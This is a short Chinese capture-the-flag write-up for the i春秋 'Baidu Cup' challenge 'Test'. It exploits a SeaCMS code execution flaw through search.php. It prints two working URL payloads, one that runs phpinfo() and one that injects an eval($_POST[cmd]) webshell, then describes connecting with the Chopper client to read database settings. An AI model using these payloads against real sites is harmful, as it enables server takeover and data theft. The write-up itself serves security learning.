打开发现是海洋cms，那就搜索相关漏洞

i春秋——“百度杯”CTF比赛 九月场——Test（海洋cms / seacms 任意代码执行漏洞）-1.jpg

1.jpg

找到一篇介绍海洋cms的命令执行漏洞的文章：https://www.jianshu.com/p/ebf156afda49直接利用其中给出的poc

/search.phpsearchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=ph&9[]=pinfo();

i春秋——“百度杯”CTF比赛 九月场——Test（海洋cms / seacms 任意代码执行漏洞）-2.jpg

2.jpg

可以执行系统命令

i春秋——“百度杯”CTF比赛 九月场——Test（海洋cms / seacms 任意代码执行漏洞）-3.jpg

3.jpg

没找到flag，考虑可能在数据库中，想上传一句话，然后用菜刀查数据库来着，但是没有写文件的权限，手动查数据库感觉太麻烦，所以换个exp海洋cms v6.28命令执行漏洞 ： https://www.uedbox.com/seacms-v628-0day/

/search.php?searchtype=5&tid=&area=eval($_POST@[cmd])

菜刀直接连接找了好久终于找到数据库配置文件

4.jpg

i春秋——“百度杯”CTF比赛 九月场——Test（海洋cms / seacms 任意代码执行漏洞）-4.jpg

编辑该条shell配置如下

i春秋——“百度杯”CTF比赛 九月场——Test（海洋cms / seacms 任意代码执行漏洞）-5.jpg

i春秋——“百度杯”CTF比赛 九月场——Test（海洋cms / seacms 任意代码执行漏洞）-6.jpg

5.jpg

6.jpg

最后得到flag

7.jpg

上一篇：海洋cms通用的百度主动推送工具苹果cms和海洋cms

下一篇：海洋cms添加对联广告